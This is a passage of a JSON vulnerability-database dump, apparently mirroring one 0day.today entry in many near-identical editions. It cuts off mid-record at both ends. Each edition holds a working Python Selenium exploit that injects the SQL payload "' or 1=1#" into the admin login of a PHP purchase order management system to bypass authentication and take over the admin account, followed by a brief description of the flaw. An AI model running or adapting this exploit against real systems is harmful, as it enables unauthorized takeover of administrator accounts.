0.2, "vector": "NONE", "modified": "2021-09-25T00:40:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-01] #"}, "lastseen": "2021-09-30T22:24:12", "differentElements": ["sourceData"], "edition": 20}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "6845ce21e9be8aed64bfcbb417aa928f", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-01T22:37:24", "history": [], "viewCount": 37, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:57", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-25T00:40:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-02] #"}, "lastseen": "2021-10-01T22:37:24", "differentElements": ["sourceData"], "edition": 21}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "109e7f3688036764f73e6d5cff10de21", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-02T22:33:23", "history": [], "viewCount": 38, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-25T00:40:57", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-09-25T00:40:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-03] #"}, "lastseen": "2021-10-02T22:33:23", "differentElements": ["sourceData"], "edition": 22}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "846b68a0ee984baf8cb6fc8bdf836952", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-04T06:42:05", "history": [], "viewCount": 38, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-04T06:42:05", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-10-04T06:42:05", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-04] #"}, "lastseen": "2021-10-04T06:42:05", "differentElements": ["sourceData"], "edition": 23}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "77d01b1988fbf32d433ef2db01531371", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-05T02:37:39", "history": [], "viewCount": 38, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-04T06:42:05", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-10-04T06:42:05", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-05] #"}, "lastseen": "2021-10-05T02:37:39", "differentElements": ["sourceData"], "edition": 24}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "fc3f796f9662cf065bf9c0c4a56423a3", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-05T22:34:22", "history": [], "viewCount": 38, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-04T06:42:05", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-10-04T06:42:05", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-06] #"}, "lastseen": "2021-10-05T22:34:22", "differentElements": ["sourceData"], "edition": 25}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "6433e4bdb98ff12166ca4d392212b93f", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-06T22:39:48", "history": [], "viewCount": 38, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-04T06:42:05", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-10-04T06:42:05", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-07] #"}, "lastseen": "2021-10-06T22:39:48", "differentElements": ["sourceData"], "edition": 26}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "d51b739ab63a17246d936aebdaa1e5e0", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-08T00:41:31", "history": [], "viewCount": 40, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-04T06:42:05", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-10-04T06:42:05", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote 